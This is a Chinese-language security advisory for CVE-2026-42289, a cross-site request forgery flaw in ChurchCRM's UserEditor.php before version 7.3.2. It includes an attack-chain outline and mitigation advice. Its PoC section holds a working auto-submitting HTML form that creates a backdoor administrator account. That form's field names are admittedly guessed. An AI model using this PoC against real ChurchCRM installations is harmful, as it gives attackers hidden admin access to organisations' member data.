CVE-2026-42289 CVSS 8.8 高危

CVE-2026-42289 ChurchCRM跨站请求伪造漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42289

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

ChurchCRM

漏洞概述

ChurchCRM是一款开源的教会管理系统。在7.3.2版本之前，UserEditor.php文件在处理用户账户创建和权限更新时，完全依赖$_POST参数且未进行CSRF令牌验证。未经身份验证的攻击者可诱导管理员访问恶意页面，在受害者不知情的情况下将低权限用户提升为管理员，或创建新的管理员后门账户。该漏洞在7.3.2版本中已修复。

技术细节

该漏洞源于ChurchCRM的UserEditor.php组件缺乏有效的跨站请求伪造（CSRF）防护机制。系统在处理用户创建和权限修改请求时，未验证请求来源的合法性（即未检查CSRF Token），仅依赖POST参数进行业务逻辑处理。攻击者可以构造一个包含恶意POST请求的HTML页面，该请求指向UserEditor.php并包含提升权限或创建管理员的参数。当已登录的管理员访问此页面时，浏览器会自动携带管理员的Session Cookie发送请求。由于服务器端未校验Token，系统误以为这是管理员的合法操作，从而执行了恶意代码，导致账户权限被非法提升或后门账户被创建。漏洞核心在于身份验证与请求处理的隔离缺失，攻击者利用了用户浏览器对目标网站的信任关系，严重破坏了系统的访问控制边界。

攻击链分析

STEP 1

步骤1

攻击者针对UserEditor.php接口构造CSRF恶意HTML页面。

STEP 2

步骤2

攻击者诱导已登录的ChurchCRM管理员访问该恶意页面。

STEP 3

步骤3

管理员浏览器在后台自动携带Session Cookie发送伪造的POST请求。

STEP 4

步骤4

服务器端因缺少CSRF验证，执行请求并创建管理员或提升权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<html>
<!-- CSRF PoC for ChurchCRM UserEditor.php -->
<body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://target-churchcrm/UserEditor.php" method="POST">
    <input type="hidden" name="UserName" value="hacker" />
    <input type="hidden" name="Password" value="P@ssw0rd!" />
    <!-- Assuming a field like perms or role exists -->
    <input type="hidden" name="SystemAdmin" value="true" />
    <input type="hidden" name="Action" value="Add" />
    <input type="submit" value="Submit request" />
  </form>
  <script>
    document.forms[0].submit();
  </script>
</body>
</html>

影响范围

ChurchCRM < 7.3.2

防御指南

临时缓解措施

建议管理员立即检查系统用户列表，确认是否存在未授权的新增管理员或权限异常提升的账户。在升级修复前，应限制对UserEditor.php页面的访问或仅在可信网络环境下管理后台，避免点击不明链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表